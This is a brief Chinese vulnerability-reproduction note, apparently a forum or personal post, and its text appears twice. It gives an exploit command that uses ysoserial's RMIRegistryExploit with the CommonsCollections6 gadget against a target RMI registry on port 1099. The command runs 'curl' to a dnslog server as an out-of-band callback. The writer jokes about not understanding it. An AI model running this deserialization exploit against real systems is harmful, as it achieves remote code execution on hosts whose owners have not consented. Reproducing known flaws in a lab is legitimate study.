漏洞复现
先去这http://www.dnslog.cn/搞个dns
然后用这个命令:
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "curl your-dnslog-server"
然后刷新dnslog
好兄弟们你们看懂了吗?反正我没懂
先去这http://www.dnslog.cn/搞个dns
然后用这个命令:
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "curl your-dnslog-server"
然后刷新dnslog
好兄弟们你们看懂了吗?反正我没懂